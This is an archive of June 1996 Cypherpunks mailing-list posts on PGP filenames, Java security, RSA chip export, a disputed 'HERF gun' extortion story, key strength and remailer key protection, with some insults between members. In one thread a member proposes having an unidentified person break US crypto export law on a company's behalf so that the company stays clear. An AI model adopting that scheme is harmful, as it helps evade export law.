I suffer from the great misfortune of a dos computer, and despite my
anti-micro$oft efforts, I still am stuck, most of the time, with Windows
95. This OS assigns long filenames (the sensible kind, that is) to the
old-style eight-character and three-character separated by a dot. However,
they did it in such a way that old filenames still work. So if I have a 
file I want to encrypt, PGP will mess up this system.

oldname.txt -> oldname.asc

This is the normal way PGP would encrypt. However, f I have assigned the 
oldname.txt file a new file name under the win95 system, it will look
something like this.

"Old File" (oldfil~1.txt)

This conforms with the new scheme. If I PGP encrypt, this happens:

oldfil~1.txt -> oldfil~1.asc

Thus, the new filename is lost, both for the ciphered file, and for
the file once I decrypt. Is there a way (aside from not using long
filenames) such as a hacked version of PGP that has a workaround for
this problem? Also, is this an issue on the list of improvements for
future official versions of PGP?

===============================================================================
David Rosoff (nihongo o chiisaku dekimasu)  ------------->  drosoff@arc.unm.edu
For PGP key 0xD37692F9, finger drosoff@acoma.arc.unm.edu or get from keyservers
pub  1024/D37692F9 1995/07/01 David Rosoff <drosoff@arc.unm.edu>
          Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
I accept anonymous mail. If I didn't sign it, you don't know I wrote it.
===
"Made weak by time and fate, but strong in will / To strive, to seek, to find--
and not to yield." <---- "Ulysses", by Alfred, Lord Tennyson

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMbTExRguzHDTdpL5AQGo5QP/QqZw0PLK5/jNY42nbJ/VRrAj8g62FK7q
zxWMVbindqQZaOYRtNVHy28rzjkBy+ybzhWetmLgny4f2zdUFkTf5OgZ0r27oOGQ
93VmAK8FoMTBhtje3y4OjWc2uqqHWSYkhjZVYWVCxVcFL1GA6FMkIs8pnzqb5Ohy
ShWTgpaV6OM=
=SLEx
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 5 Jun 1996 15:20:46 +0800
To: cypherpunks@toad.com
Subject: Re: FOR WHOM THE BELL TOLLS
Message-ID: <adda2c40020210044527@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:30 PM 6/4/96, Sandy Sandfort wrote:

>To which Jim Bell replied:
>
>>I have a solution to that problem.
>
>My question for member of this list is:  When Bell finally
>goes too far and they arrest or shoot him, how can we best
>capitalize on his martyrdom?  Or in a more negative light,
>what damage control will we need to do in that case?
>
>Now I know that barking dogs rarely bite, but Jim may just
>fool us and find his cajones.  In any event, the sort of
>yapping he is doing could itself be considered a crime that
>could attract the sort of negative attention he apparently
>craves.
>
>Any suggestions?

As we've all learned from our studies of quantum cryptography, the answer
lies in Bell's Theorem. As we know, Bell's Theorem says that if a Bell is
ever removed in one place, another Bell appears someplace else
instantaneously.

Glad to be of help.

--Klaus! von Future Prime







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 5 Jun 1996 13:46:20 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: PM's Java Envy
In-Reply-To: <199606042033.NAA17694@netcom19.netcom.com>
Message-ID: <199606042232.SAA09572@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Vladimir Z. Nuri" writes:
> PM returns to rant on Java after being mowed down by most people
> her. why? I think he has some more ulterior problems with Java
> than those that he cites. for Perry, ranting at java reveals
> certain psychological characteristics of his profile.

Detweiler, just because you see lots of psychiatrists during your days
in the sanitarium doesn't mean you qualify as one.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 5 Jun 1996 15:17:33 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Java
In-Reply-To: <199606042058.NAA19741@netcom19.netcom.com>
Message-ID: <199606042238.SAA09594@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Vladimir Z. Nuri" writes:
> >Many languages are machine independent. Thats hardly a new feature.
> 
> you don't get it, as others have pointed out repeatedly. you conveniently
> ignore Frantz' points about the well-known difficulties of porting
> C.

Who said anything about C, Detweiler. Smalltalk. Scheme. Postscript. 
There are dozens of them out there. All of them are totally machine
independent. You could run Smalltalk images byte for byte identical on
large numbers of different processors years and years and years
ago. Byte codes aren't new either -- Smalltalk's virtual machine, PSL
and others had them decades ago.

The rest of your comments are equally silly.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 5 Jun 1996 16:24:42 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Java
In-Reply-To: <199606042119.OAA07878@netcom7.netcom.com>
Message-ID: <199606042241.SAA09606@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz writes:
> >You could hand any websurfer a Netscape PGP plugin without much work
> >at all, and you could easily build it on lots of platforms. After all,
> >look at how many platforms that lowly C code like PGP runs on.
> 
> Why don't we have one of these now?  (N.B. not a rhetorical question)

I don't know. I suppose its because cypherpunks post stupid commentary
on non-cryptographic issues. Perhaps you should suggest it as a
project on CoderPunks.

> I thought this was the effect the Unix people get when they run
> applications such as firewall code in a "chroot jail".  Perhaps Netscape
> could make you happy by having its Unix based browsers run Java applet
> interpreters in such a jail.  (I don't know, Unix is an imperfectly spoken
> foreign language to me.)

Chroot isn't a real solution for this sort of application.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 5 Jun 1996 15:16:09 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Markoff in NYT on NTT/RSA chip
In-Reply-To: <199606042119.OAA07875@netcom7.netcom.com>
Message-ID: <199606042249.SAA09659@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz writes:
> (However, the article does say that NTT has already sold chips to IBM in
> the US.  I guess you can sell, but not deliver, until you get the license.)

IBM already has an RSA license, so perhaps that could cover it for IBM
use.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 5 Jun 1996 15:43:22 +0800
To: cypherpunks@toad.com
Subject: Re: Class III InfoWar: TST Article
Message-ID: <adda35c8040210048255@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:34 PM 6/4/96, Steven Levy wrote:
>If it's a myth, it's quite an elaborate one. On Saturday night I was
>interviewed by the BBC about this.  The producer read the entire article
>to me, telling me in was on the front page of the Times. (My comments
>were not about the specific story, but the underlying security issues.) I
>don't think he was making it up.

On the substance of Schwartau's claims about "HERF guns," I'm a bit
skeptical that this is a real threat _at this time_. I'll say more on this
later.

On some of the points raised by the article, some things don't compute. At
one point it is claimed that no one who in London (and presumably
elsewhere) would ever dare to comment on threats received or extortion
demands met. If so, how does the author know such threats have actually
been made? (I mean credible threats, not anonymous call-in threats, such as
bomb threats.)

I read Winn Schwartau's book, "Information Warfare," as preparation for
being interviewed for a BBC "Horizon" show called "The I-Bomb."
Coincidentally, a friend of mine who shall remain nameless was doing some
consultation work on this very issue (HERF guns, suitcase impulse sources,
etc.).

Magnetohydrodynamic RF sources--not to be confused with "electromagnetic
pulse" (EMP) from extraatmospheric nuclear blasts--can generate huge RF
fields in small packages, by focussing explosions in conjunction with coils
to launch the pulses.

So, why am I so skeptical? For a couple of reasons:

1. Conventional explosives work perfectly fine for a lot of sabotage
efforts. It is unlikely that a mysterrious van is likely to be parked next
to a London brokerage or computer firm in the City of London, given their
history of terrorism.

2. To be a credible threat, there usually needs to be some form of
"demonstration." I have heard of no such thing. Absent such a public
demonstration, I find it hard to believe that beancounters would OK the
giving away of hundreds of millions of dollars for a threat which is
abstract and hard to understand for laymen.

3. This recent story smacks of hype. I'm not saying Schwartau is hyping his
conferences and his book, and his consulting business, just saying it
strikes me as a hyped threat without direct confirmation.

So sue me. (On second thought, in this litigious society, please don't.)

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 5 Jun 1996 17:20:58 +0800
To: perry@piermont.com
Subject: Re: Java
Message-ID: <199606042334.TAA29203@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


I'll add a few comments about the "Java hype monster"... it seems a 
good way for people to make money off of computing in ways they 
haven't before (and in ways which probably won't work anyhow).

A lot of the Java hype has been how one only needs a "network 
appliance" that logs in and uses remote applets which are instantly 
updated.  Less risk of software piracy, more phone bills and network 
membership fees, of course. (Nevermind other risks added in this sort 
of system).  It seems like a kind of cable-tv-for-the-internet.  
People will join a service that provides an array of applications. 
Network membership fees and phonebills... or maybe they'll use cable 
modems and it will be included with the cable bill on their 
JavaVision (tm) boxes?

On the plud side, though: C never did standardize graphical 
interfaces.  Notice most of the demos in the JDK are graphical?

Rob.

---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Wed, 5 Jun 1996 17:06:38 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: How to explain crypto?
In-Reply-To: <v01510100adda3101165c@[204.62.128.229]>
Message-ID: <Pine.A32.3.93.960604185950.36410A-100000@seminole.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


Im quoting directly from the PGP manual from pgp2.6.2:

"People who work in factoring research say that the workload to
exhaust all the possible 128-bit keys in the IDEA cipher would
roughly equal the factoring workload to crack a 3100-bit RSA key,
which is quite a bit bigger than the 1024-bit RSA key size that most
people use for high security applications..."

If we take phil at his word, I would say that comparing 90bit symetric to
1024bit RSA would be a bit generous to RSA. 

On Tue, 4 Jun 1996, Declan McCullagh wrote:

>   "The 1024 bit key is likely an RSA key, and is not comperable to a 40 bit
>   symetric key.  From memory, 1024 bit RSA is about as hard to crack as 90
>   bit symetric."
> 
> Is this a reasonable comparison?
> 
> -Declan
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 5 Jun 1996 17:45:29 +0800
To: Ben Holiday <ncognito@gate.net>
Subject: Re: Electronic Signature Act Of 1996
Message-ID: <199606042344.TAA29411@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  4 Jun 96 at 10:33, Ben Holiday wrote:

> Florida now recognizes electronic signatures as legal and binding. In
> other words - its okay to sign it by modem.
> 
> The electronic Signature Act of 1996 passed the Legislature unanimously
> and became law Friday. The law does not specify how an electronic document
> must be signed, but it probably will mean coding the text and typed
> signature so they cannot be changed by anyone other than the writer. 
[..]

I've seen some legal arguments that an email message that reads 
"Bob, Sounds good--it's a deal. --Alice" can in some circumstances be 
as binding as an oral contract or a scribbled note, which is not 
meaningless though not as strong as a legal signed contract. As long 
as one can show Alice *did* write that, that it referred to a 
specific deal, etc. etc., it holds some legal weight.

But I'm no lawyer, and one should never trust legal advice form 
Usenet or the c'punks list.

Rob.
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 5 Jun 1996 17:33:49 +0800
To: Ted Garrett <teddygee@visi.net>
Subject: Re: NYT on NTT/RSA Chips
Message-ID: <199606050231.TAA00162@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:53 PM 6/4/96 -0400, Ted Garrett wrote:
>At 09:12 AM 6/4/96 -0800, someone claiming to be <jimbell@pacifier.com> wrote:
>
>>Maybe it's just me, but the solution to NTT's problem is obvious.  Even 
>>assuming that the export of this software would be against the law, why 
>>doesn't somebody simply violate that law?  RSA would publish that software, 
>>possibly encrypted with NTT's public key, on a public system protected 
>>against direct export.  "Somebody" would download it, write it to a floppy 
>(...)
>>As far as I know, there is nothing wrong with NTT using this software even 
>>if it is assumed to have been exported illegally.  Obviously, NTT won't 
>>_ask_ for somebody to do this, because then the government will claim it was 
>>all a conspiracy, but that doesn't prevent NTT from being the beneficiary of 
>>somebody else's activities.
>
>What is wrong with this is that, because RSA did not, in practice deliver
>the software to NTT, they can have no expectation of payment. 

No, the copyright is still valid, and NTT couldn't use the software without 
appropriate payment.

> Thus begins
>a trumped up lawsuit in international court, and it will eventually cost
>RSA more to collect on the sale than the sale was worth.  As many rock-solid
>implementations of the RSA algorithms as are out there, all NTT has to do
>is go to an FTP site in the netherlands.  Done deal.  But what about the
>copyrights (which are still unclear) and the US patents?  NTT would not be
>able to market their system in the US without losing face.

The purpose of the strategem I described is NOT intended to allow NTT to use 
software without paying.  NTT and RSA are probably on very friendly terms, 
anyway.  The purpose is to compartmentalize the illegality to an 
unidentifiable person, allowing NTT to use the software without having 
violated any law.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 5 Jun 1996 18:23:30 +0800
To: cypherpunks@toad.com
Subject: Re: Java
Message-ID: <adda454f07021004283a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I find myself agreeing with nearly all the points about Java that Larry is
making, so something may be wrong....

At 8:58 PM 6/4/96, Vladimir Z. Nuri wrote:
...

>I suppose if I was over 40 and worked in a conservative wall street firm,
>I'd have a totally different view. maybe Java is all about a generation
>gap in computing. hey!! the first language that the "older generation"
>hates. sounds like a good reason to go after it, sort of like rock-n-roll
>and Woodstock suddenly being aged and uncool.

This can't be the whole story. I'm 44, and Java looks pretty damn exciting
to me, too. Not exciting to stand elbow-to-elbow and be trampled the crowds
at Moscone Center for Java One, but exciting enough to get the Metrowerks
Java compiler for the Mac and half a dozen or so of the Java books (some of
which are even pretty good--I most like "Core Java" and the Gosling book).

I don't have the energy or time to write a Detweiler-length article about
Java (though I think I did a month or so ago), but will say that I think
the security problems are, first of all, no worse vis-a-vis the language
itself than problems with any language.

For me, the main attraction of Java lies  not in the applets, but in the
Net-centric model that makes, in theory (and hopefully in practice) a
Macintosh roughly the equal of a Sun or SGI or Pentium. Until Java and
associated programs and tools appeared, I was seriously thinking about
getting a Pentium or Pentium Pro (shudder, even though I admire my former
employer and current stock benefactor, Intel) and putting Linux on it. Now
I feel more confident that the Mac is a viable competitor in a Net-centric
world. Java may be the Great Equalizer (something Sun may come to regret).

Perry has some valid points vis-a-vis the most naive uses of applets. Were
I the security manager of Morgan Stanley, I would certainly not want
traders downloading "kewl" applets and (possibly) causing Big Problems. So
what else is new?

Java as a language and as a platform-independent implementation is an
achievement. As for Scheme and Smalltalk, both mentioned by Perry, I have
both of these and of course neither has caught on a big way. I won't even
speculate about the many reasons.

And in some ways a more important comparison is to Perl and TCL, along with
more obscure languages like Python and REXX. The welter of Net-oriented
languages shows signs of  being much-simplified by the wide adoption of
Java. It will be interesting to watch the next several years of
developments.


-- Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 5 Jun 1996 16:54:49 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: LIMITED SF BAY AREA INTEREST
Message-ID: <Pine.SUN.3.91.960604201325.18451A-100000@crl14.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Those of you who know Dana Drenkowski are invited to his 50th
birthday party on Saturday.  There is some conflict with the
monthly Cypherpunks meeting, but you could come late to the
party.  (It's in Golden Gate Park.)

If you would like to attending, let me know as soon as possible.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 5 Jun 1996 16:41:20 +0800
To: John Gilmore <cypherpunks@toad.com
Subject: Re: MELP: 2400 baud speech coding
Message-ID: <199606050332.UAA03708@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:31 PM 6/4/96 -0700, John Gilmore wrote:
>Mixed-Excitation Linear Predictive encoding gives better speech
>quality than CELP at half the data rate.  Encoding and decoding
>together burn up more than 100% of a TMS320C3x digital signal
>processor at 33MHz -- 64% to encode and 53% to decode.

Does this mean to convert to compressed data AND encrypt, or just converting 
to compressed bits?



>  I don't know
>how it does on a Pentium or an Alpha.  If you have the MIPS at both
>ends, this enables very robust encrypted speech across modem links to
>the Internet. 

I'd rather see thousands of Internet-phone users transmitting at 2400 bps 
than 28.8 kbps...

This is going to add to the telephone companies' woes:  They obviously don't 
want people to have access to nearly-free Internet-LD phone service, but 
their arguments for its regulation will be weaker when it is pointed out 
that the bit rate for compressed, encrypted Internet phone are 2400 bps as 
opposed to 64,000 bps for POTS.

Which raises another question:  When are Internet ISP's going to start 
acting as Internet-phone gateways?  Currently, you can't call somebody on 
POTS with Internet phone.  This would be solved if ISP's could install 
modems and software which did audio-synthesis/digitization on an outbound 
call, driven by the data received on the Internet, and sending the data back 
to the calling end.  Any guesses as to when this will be real?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Garrett <teddygee@visi.net>
Date: Wed, 5 Jun 1996 15:51:49 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: NYT on NTT/RSA Chips
Message-ID: <2.2.32.19960605005329.0076a668@mail.visi.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:12 AM 6/4/96 -0800, someone claiming to be <jimbell@pacifier.com> wrote:

>Maybe it's just me, but the solution to NTT's problem is obvious.  Even 
>assuming that the export of this software would be against the law, why 
>doesn't somebody simply violate that law?  RSA would publish that software, 
>possibly encrypted with NTT's public key, on a public system protected 
>against direct export.  "Somebody" would download it, write it to a floppy 
(...)
>As far as I know, there is nothing wrong with NTT using this software even 
>if it is assumed to have been exported illegally.  Obviously, NTT won't 
>_ask_ for somebody to do this, because then the government will claim it was 
>all a conspiracy, but that doesn't prevent NTT from being the beneficiary of 
>somebody else's activities.

What is wrong with this is that, because RSA did not, in practice deliver
the software to NTT, they can have no expectation of payment.  Thus begins
a trumped up lawsuit in international court, and it will eventually cost
RSA more to collect on the sale than the sale was worth.  As many rock-solid
implementations of the RSA algorithms as are out there, all NTT has to do
is go to an FTP site in the netherlands.  Done deal.  But what about the
copyrights (which are still unclear) and the US patents?  NTT would not be
able to market their system in the US without losing face.

Not gonna happen.

Just my $.02...
--
PGP key available on the keyservers --
A wise man said that if one seeks to preserve his security by giving up
a measure of his freedom, he shall not have either one for long...
Dude's Dead.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Wed, 5 Jun 1996 15:38:52 +0800
To: cypherpunks@toad.com
Subject: Senator Exon & me
Message-ID: <m0uR7Nb-00037KC@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


I am not one to lash out at anyone but now I feel it is appropite to tell
the group what our very own Senator Exon has said to myself. If you do not
care then delete this e-mail but if you would like to hear what a senator
said to a 13 year old then read on. 

I will not put on the whole letter just the parts that I deem inapropite. 

He wrote:

I'm not flaming you. You might not even get flamed this time. But you will be.
This is just the kind of message which I hate. It is a waste of my time and
a waste of time for people who have a lot less time than I. Please wait for
a legitimate reason to post. I might patronize your age but I won't - I was a
13-year-old net kid once.

#1 If you really wanted to show just had balls (I hate to use the phrase but
I can't think of anything better) you wouldn't hide behide remailers.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>Current Girlfriend(s)- Lindsey Wilcox, Laura Schubring

He wrote:
I don't want to be around the first time you send your girlfriend(s)
e-mail. I predict an ass-kicking of MAJOR proportion.

#2 This is kinda an inside joke
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

I really hate to waste your people times with my messages but aren't we all
on this mailing list to learn? I'm 13 hell, I bet there are people on the
list that are 5 times as old as me. I want to say that I really wanted to
talk to Senator Exon on an IRC channel but I can't seem to mail him due to
his cowerdness. I want to apologize to everyone that I may have said some
things things that were wrong in the past but I'm learning and hope to have
a great job in the computer indusrty (if there really are any). 

i will close saying that it was wrong that someone would creatique a 13 year
old's signatrure. I feel that is wrong but hell, I guess I just to young to
be a cyberkid. Thank you for hearing me out. :-)

Ps if you want the full letter e-mail me and i'll sent it to you.

Quoting my computer teacher at school- "The internet has its share of cool
people and its lamers. The lamers are your people on AOL, hacker wantabees
and your government officals"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blake "Pokey" Wehlage     Gaa- 3.69
<jwilk@iglou.com>         Record- 2-4-4
Age- 13                   Final Standings- 2nd Place (Beat in Championship)

President & Founder:
                   
Revolution Software       "I have the fastest glove in the east!"
Profanity Software        "Hackers never stop hacking they just get caught"
VSoft

My life- Rarely eat or sleep, Hack til' 7:00a, goto school, play goalie
til' 8:00p, hack til' 7:00a
Hank Aaron- d:-)!-<   Pope- +<:-)   Santa Claus- *<:-) The Unabrower |:-)

Current Girlfriend(s)- Lindsey Wilcox, Laura Schubring

Personal Quote- Mr Plow, thats my name, that name aguin is Mr. Plow 
-Homer Simpson
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant, ULC" <mark@unicorn.com>
Date: Wed, 5 Jun 1996 14:31:06 +0800
To: Dan Haskovec <dhaskove@ucsd.edu>
Subject: Re: Class III InfoWar: TST Article
Message-ID: <Pine.3.89.9606042126.A15786-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 4 Jun 1996, Dan Haskovec wrote:

> Here's the reply I got from a friend that I forwarded it to....
>      and the verdict is... NetMYTH!  I checked the cite in the article on
>      cyberterrorism... no such article ran on 6/2/96 in the Times
>      (London)... nor, in fact, in any newspaper available on Nexis...
>      just thought I would let you know...

Hate to tell ya, but I read this article on Sunday on the front page of a
real, physical, paper copy of the Sunday Times. Now admittedly I read it
in a film studio so they might have faked it, but that would be some
strange coincidence.

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 5 Jun 1996 16:21:25 +0800
To: vinnie@webstuff.apple.com (vinnie moscaritolo)
Subject: Re: Info on DES crypto program
In-Reply-To: <v03006f01adda38e7aa44@[17.203.21.75]>
Message-ID: <199606050248.VAA29523@homeport.org>
MIME-Version: 1.0
Content-Type: text


They store keys in a TOKEN file.  They don't encrypt this apparently, 
"Never send unencrypted TOKENS on the internet."

Bad key management, if you ask me.

2 Versions, one with 40 bit keys (CMDF?) is $99, the other is 'more
expensive.'  An awful lot of money for plain old des.  Viacrypt PGP
for the mac is about $129.

Adam

vinnie moscaritolo wrote:

| Hey all;
| 
| Does anyone have experience or comments about a product called Code Cryptor
| from New Mexico Software. I belive it is yet another DES based product. tey
| have a web page at:
| 
| http://www.swcp.com/cryptor/

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 5 Jun 1996 15:25:46 +0800
To: Dan Haskovec <dhaskove@ucsd.edu>
Subject: Re: Class III InfoWar: TST Article
Message-ID: <199606042153.VAA24301@pipe3.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jun 04, 1996 12:29:02, 'Dan Haskovec <dhaskove@ucsd.edu>' wrote: 
 
 
>Here's the reply I got from a friend that I forwarded it to.... 
> 
> 
>and the verdict is... NetMYTH!  I checked the cite in the article on  
>cyberterrorism... no such article ran on 6/2/96 in the Times  
>(London)... nor, in fact, in any newspaper available on Nexis...  
>just thought I would let you know... 
 
 
Gosh, Dan, your friend may want to double-check. After reading Winn
Schwartau's post, I bought a copy of The Sunday Times here in NYC late
Sunday in which the article led at the top of the Front Page. 
 
 
Be glad to fax anyone a copy who may want such, ahem, verification. E-mail
me a number. 
 
 
However, I acknowledge that there is a chance that the TLAs, or Net
security/info war consultants (like Schwartau, et al) planted the article,
a fake to generate scare-funding and boost conference attendance. Or maybe
it's a classic Brit joke, a spoof  -- or a sting by the Intergalactic Net
Police. 
 
 
Strange terrorist ripoffs happen -- incredible IPOs, vaporware
millionaires, and such. 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Wed, 5 Jun 1996 17:39:36 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: How can you protect a remailer's keys?
Message-ID: <addac392000210049493@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


The best solution I could come up with (and was willing to write and use)
is to specify the passphrase on the command line argument to the compiler

make solaris -DPASS="foozooblue"

                -Lance

At 11:55 PM 6/1/96, Bill Stewart wrote:
>Encryption is critical for protecting against traffic analysis,
>but it's tough to protect a remailer's keys.  Unlike regular email,
>where you can type the key in as you read it, remailers need to
>run automatically once you set them up.  Some of the choices are:
>- leave it around in plaintext with only Unix file protections
>        (Ghio2 works this way - does Mixmaster?  My ghio2 version has it
>        compiled into the binary, and I try to delete it from source.)
>- type it in to a long-running remailer process
>        (with human intervention to start)
>- SSL-based remailers, where the web server handles crypto on
>        a per-machine basis instead of per-remailer
>- use unauthenticated Diffie-Hellman (either hanging off
>        a TCP port somewhere instead of mail, or
>        3 pieces of email)
>- off-line or off-site remailer such as a POP3 winsock remailer
>        that makes it Somebody Else's Problem, and separates
>        the remailer's public interface from the working parts
>- human intervention on every message (which may not be totally
>        worthless for moderated news postings, if you want to
>        take that approach to spam prevention.)
>
>Anybody have any other approaches?  These are mostly weak,
>annoying, or both.
>
>
>#                               Thanks;  Bill
># Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
># http://www.idiom.com/~wcs
>#                               Rescind Authority!

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Wed, 5 Jun 1996 19:05:59 +0800
To: Scott Brickner <stewarts@ix.netcom.com>
Subject: Re: Multiple Remailers at a site?
Message-ID: <addac43501021004bb2c@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:40 PM 6/4/96, Scott Brickner wrote:
>Bill Stewart writes:
>>>I don't think multiple remailers at the same site help anything.
>>
>>Assume Alice, Bob, and Carol are on abc.com and Xenu, Yak, and Zut
>>are on xyz.com.  Remailing between Alice, Bob, and Carol doesn't
>>make appear to make much difference, but it does reduce the damage
>>if one of the remailer's keys is compromised.  On the other hand,
>>mail from Alice -> Xenu -> Bob -> Yak -> Carol -> Zut adds traffic
>>to the system, and makes traffic analysis more difficult,
>>even if the Bad Guys are watching site abc.com and have stolen
>>Alice, Bob, and Carol's keys.
>
>Wait a minute.  More traffic should make analysis easier, since traffic
>analysis is mostly statistical work on the source and destination (not
>necessarily "from" and "to").  A bigger sample makes more reliable
>results.
>
>For traffic analysis, I don't know *who* sent the message (it was,
>after all, anonymized), but I do know a site which transmitted it and
>one which received it, the time it was transmitted, and maybe its
>size.  Multiply this times a whole bunch of messages, and I can infer
>information about "common interests" between those sources and
>destinations.
>
>The delays and mixing done by remailers make it harder by
>disassociating the true sender from the true receiver.  If a remailer
>were to ignore this step, the analyst can deduce from the two data
>points
>
>    "message a, source A, destination RemailerX, time t, size s"
>    "message b, source RemailerX, destination B, time t+0.001s, size s"
>
>that there's some connection between A and B.  The more such evidence,
>the stronger the connection.  If the remailer does a good job with
